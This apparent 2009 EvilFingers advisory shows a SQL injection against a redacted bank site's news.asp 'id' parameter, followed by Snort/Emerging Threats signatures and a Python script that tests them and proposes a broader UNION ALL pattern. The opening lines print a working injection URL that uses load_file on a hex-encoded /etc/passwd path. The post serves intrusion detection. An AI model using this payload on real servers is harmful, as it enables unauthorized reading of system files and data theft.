Credit for Exploit: Rohit Bansal
Exploit:
http://www.BankXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX.com/news.asp?id=4+and+1=2+union+all+select+1,2,3,load_file(0x2f6574632f706173737764),5,6,7--
Vulnerable Variable: id=
Vulnerable File Frame: /news.asp?
SQL: UNION SELECT
Countermeasure:
Use the combination above (vulnerable file, vulnerable variable and SQL keyword) to ensure that your Snort signature prevents the attack.
Example(s) in Emerging Threats format:
alert tcp $EXTERNAL_NET any -> $HTTP_SERVERS $HTTP_PORTS (msg:"BLEEDING-EDGE news.asp SQL Injection Attempt -- news.asp id SELECT"; flow:established,to_server; uricontent:"/news.asp?"; nocase; uricontent:"id="; nocase; pcre:"/.+SELECT.+FROM/Ui"; classtype:web-application-attack; reference:cve,; reference:url,www.; sid:200XXXXX; rev:1;)
alert tcp $EXTERNAL_NET any -> $HTTP_SERVERS $HTTP_PORTS (msg:"BLEEDING-EDGE news.asp SQL Injection Attempt -- news.asp id UNION SELECT"; flow:established,to_server; uricontent:"/news.asp?"; nocase; uricontent:"id="; nocase; pcre:"/.+UNION\s+SELECT/Ui"; classtype:web-application-attack; reference:cve,; reference:url,www.; sid:200XXXXX; rev:1;)
alert tcp $EXTERNAL_NET any -> $HTTP_SERVERS $HTTP_PORTS (msg:"BLEEDING-EDGE news.asp SQL Injection Attempt -- news.asp id INSERT"; flow:established,to_server; uricontent:"/news.asp?"; nocase; uricontent:"id="; nocase; pcre:"/.+INSERT.+INTO/Ui"; classtype:web-application-attack; reference:cve,; reference:url,www.; sid:200XXXXX; rev:1;)
alert tcp $EXTERNAL_NET any -> $HTTP_SERVERS $HTTP_PORTS (msg:"BLEEDING-EDGE news.asp SQL Injection Attempt -- news.asp id DELETE"; flow:established,to_server; uricontent:"/news.asp?"; nocase; uricontent:"id="; nocase; pcre:"/.+DELETE.+FROM/Ui"; classtype:web-application-attack; reference:cve,; reference:url,www.; sid:200XXXXX; rev:1;)
alert tcp $EXTERNAL_NET any -> $HTTP_SERVERS $HTTP_PORTS (msg:"BLEEDING-EDGE news.asp SQL Injection Attempt -- news.asp id ASCII"; flow:established,to_server; uricontent:"/news.asp?"; nocase; uricontent:"id="; nocase; pcre:"/.+ASCII\(.+SELECT/Ui"; classtype:web-application-attack; reference:cve,; reference:url,www.; sid:200XXXXX; rev:1;)
alert tcp $EXTERNAL_NET any -> $HTTP_SERVERS $HTTP_PORTS (msg:"BLEEDING-EDGE news.asp SQL Injection Attempt -- news.asp id UPDATE"; flow:established,to_server; uricontent:"/news.asp?"; nocase; uricontent:"id="; nocase; pcre:"/.+UPDATE.+SET/Ui"; classtype:web-application-attack; reference:cve,; reference:url,www.; sid:200XXXXX; rev:1;)
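The check below is an added example, not part of the original post and not an EvilFingers or Emerging Threats tool: it runs the six pcre expressions from the signatures above against the request quoted under "Exploit" and reports which of them fire. How Snort's /U normalization treats '+' is modelled both ways as an assumption, and UNION_ALL is a suggested broader pattern constructed for this example.

```python
import re
from urllib.parse import unquote

# The six pcre bodies from the signatures above; the /i flag maps to
# re.IGNORECASE. Snort's /U (normalized URI) is approximated by decode().
PAGE_PCRES = {
    "SELECT": r".+SELECT.+FROM",
    "UNION SELECT": r".+UNION\s+SELECT",
    "INSERT": r".+INSERT.+INTO",
    "DELETE": r".+DELETE.+FROM",
    "ASCII": r".+ASCII\(.+SELECT",
    "UPDATE": r".+UPDATE.+SET",
}

# Assumption (not from the page): a broader UNION pattern that tolerates an
# optional ALL keyword and '+' used as a separator.
UNION_ALL = r"UNION[\s+]+(?:ALL[\s+]+)?SELECT"

# URI portion of the request quoted at the top of the page.
PAGE_URI = ("/news.asp?id=4+and+1=2+union+all+select+1,2,3,"
            "load_file(0x2f6574632f706173737764),5,6,7--")

def decode(uri, plus_as_space):
    """Percent-decode; optionally treat '+' as a space (assumption)."""
    uri = unquote(uri)
    return uri.replace("+", " ") if plus_as_space else uri

def gated(uri):
    """Mirror the two uricontent checks (nocase) shared by all six rules."""
    low = uri.lower()
    return "/news.asp?" in low and "id=" in low

def fired(uri, patterns=PAGE_PCRES):
    """Return the labels whose pcre matches in either decoding of the URI."""
    if not gated(uri):
        return []
    views = [decode(uri, False), decode(uri, True)]
    return [name for name, rx in patterns.items()
            if any(re.search(rx, v, re.IGNORECASE) for v in views)]

if __name__ == "__main__":
    broader = {"UNION ALL SELECT": UNION_ALL}
    print("page rules fired:  ", fired(PAGE_URI))
    print("broader rule fired:", fired(PAGE_URI, broader))
    print("benign request:    ", fired("/news.asp?id=4", broader))
```

None of the six page patterns match the quoted request, because it uses UNION ALL SELECT and contains no FROM clause; the broader pattern does match it and stays silent on a plain `id=4` request.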
Disclosure: EvilFingers guarantees neither the exploit nor the signature.
Contact us at Contact.Fingers @ gmail.com for any further questions.
- EF
Sunday, January 4, 2009